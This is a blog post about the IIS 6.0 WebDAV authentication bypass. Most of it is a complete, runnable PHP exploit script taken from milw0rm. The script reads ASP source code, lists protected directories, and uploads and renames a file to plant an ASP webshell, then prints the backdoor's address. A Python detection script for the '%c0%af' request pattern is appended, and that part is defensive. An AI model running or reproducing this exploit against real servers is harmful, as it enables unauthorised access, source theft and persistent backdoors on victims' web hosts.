IIS 6 WEBDAV Exploit Code
One week after a bug was found in the Windows web server IIS 6.0 with WebDAV installed, exploit code for the weakness was released. The exploit code is written as a PHP script. Besides letting an attacker view the contents of files on the server, it also allows the attacker to create files on the victim server (a backdoor). This has been demonstrated by a hacker from France on his blog, http://securiteweb.org/?p=117.
<?
print_r('
******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********
Usage: php '.$argv[0].' source/path/put host path
Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp
Example2: php '.$argv[0].' path www.tian6.com /secret/
Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
');

// initial argument checks
if($argv[1]!="source"&&$argv[1]!="path"&&$argv[1]!="put"){echo "Choose a action,source or path or put.";die;}
else {$action=$argv[1];}
if(stristr($argv[2],"http://")){echo "No http:// in the host!";die;}
else{$host=$argv[2];}
if(stristr($argv[3],"/")==false){echo "Where is the / ?";die;}
else{$path=$argv[3];}

//sent
function sent($sock)
{
    global $host, $html;
    $ock=fsockopen(gethostbyname($host),'80');
    if (!$ock) {
        echo 'No response from '.$host; die;
    }
    fputs($ock,$sock);
    $html='';
    while (!feof($ock)) {
        $html.=fgets($ock);
    }
    fclose($ock);
}

if($action=="source"){
    $position=strrpos($path,"/");
    $path=substr_replace($path,"%c0%af/",$position,1);
    $sock="GET ".$path." HTTP/1.1\r\n";
    $sock.="Translate: f\r\n";
    $sock.="Host: ".$host."\r\n";
    $sock.="Connection:close\r\n\r\n";
    sent($sock);
    echo $html;
    die;
}

if($action=="path"){
    $position=strrpos($path,"/");
    $path=substr_replace($path,"%c0%af",$position,0);
    $sock="PROPFIND ".$path." HTTP/1.1\r\n";
    $sock.="Host: ".$host."\r\n";
    $sock.="Connection:close\r\n";
    $sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
    $sock.="Content-Length: 0\r\n\r\n";
    $sock.='<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>';
    sent($sock);
    $bur=explode("<a:href>",$html);
    foreach($bur as $line){$no=strpos($line,"<");$resultat.=substr($line,0,$no)."\n";}
    echo $resultat;
    die;
}

if($action=="put"){
    echo "Remember,keep urfile in type txt!\r\n\r\n";
    $fp = fopen("test.txt", 'r');
    if($fp!=false){
        while (false!==($char = fgets($fp))) {
            $fir1=$char;
        }
        fclose($fp);
        $position=strrpos($path,"/");
        $path=substr_replace($path,"%c0%af",$position,0);
        $sock="PUT ".$path."test.txt HTTP/1.1\r\n";
        $sock.="Host: ".$host."\r\n";
        $sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
        $sock.="Connection:close\r\n";
        $sock.="Content-Length: ".strlen($fir1)."\r\n\r\n";
        $sock.="".$fir1."\r\n";
        echo $sock;
        sent($sock);sleep(2);
        $sock="MOVE ".$path."test.txt HTTP/1.1\r\n";
        $sock.="Host: ".$host."\r\n";
        $sock.="Connection:close\r\n";
        $sock.="Destination: ".$path."racle.asp\n\n";
        sent($sock);
        echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";
        die;}
    else{die;}
}

# milw0rm.com [2009-05-22]
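On the detection side, the requests this script sends share one marker: `%c0%af` inserted into the path, combined with `Translate: f`, PROPFIND, PUT or MOVE. The Python check below is an added example (not part of the original post or of the exploit script); it flags that marker in raw HTTP request heads and generalizes it to any overlong two-byte UTF-8 sequence in the path or the Destination header. The host name, sample requests and finding labels are constructed for illustration.

```python
import re

# 0xC0/0xC1 are never valid UTF-8 lead bytes; followed by a continuation byte
# they form an overlong encoding of an ASCII character (%c0%af decodes to "/").
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)
FLAGGED_METHODS = {"PROPFIND", "PUT", "MOVE"}  # methods the script sends besides GET

def parse_request(raw):
    """Split a raw HTTP request head into (method, target, headers)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0].upper()
    target = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def classify(raw):
    """Return findings for one request; an empty list means nothing matched."""
    method, target, headers = parse_request(raw)
    findings = []
    in_path = bool(OVERLONG.search(target))
    if in_path:
        findings.append("overlong-utf8-in-path")
    if OVERLONG.search(headers.get("destination", "")):
        findings.append("overlong-utf8-in-destination")
    if in_path and method in FLAGGED_METHODS:
        findings.append("flagged-method:" + method)
    if in_path and headers.get("translate", "").lower() == "f":
        findings.append("translate-f-source-read")
    return findings

# Constructed sample requests (hypothetical host iis.example.test), not captured traffic.
HOST = "Host: iis.example.test\r\n"
SAMPLES = {
    "source": "GET /blog%c0%af/readme.asp HTTP/1.1\r\nTranslate: f\r\n" + HOST + "\r\n",
    "listing": "PROPFIND /secret%C0%AF/ HTTP/1.1\r\n" + HOST + "Content-Length: 0\r\n\r\n",
    "rename": "MOVE /secret%c0%af/test.txt HTTP/1.1\r\n" + HOST
              + "Destination: /secret%c0%af/renamed.asp\r\n\r\n",
    "benign": "PROPFIND /docs/ HTTP/1.1\r\n" + HOST + "Depth: 1\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify(raw) or "clean")
```

The same pattern can be applied to reverse-proxy or IDS request captures taken in front of an IIS 6.0 host; it assumes the capture preserves the percent-encoded path as sent.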
For more information, visit:
http://cenary.com/microsoft-mengeluarkan-security-advisory-971492-terkait-bugs-iis-60.html
http://cenary.com/microsoft-iis-60-webdav-remote-authentication-bypass.html
http://milw0rm.com/exploits/8765



[...] that is installed. In fact, several exploit variants are available for this IIS 6 bug, one of them at http://cenary.com/iis-6-webdav-exploit-code.html. At present Microsoft only provides steps to reduce the security risk [...]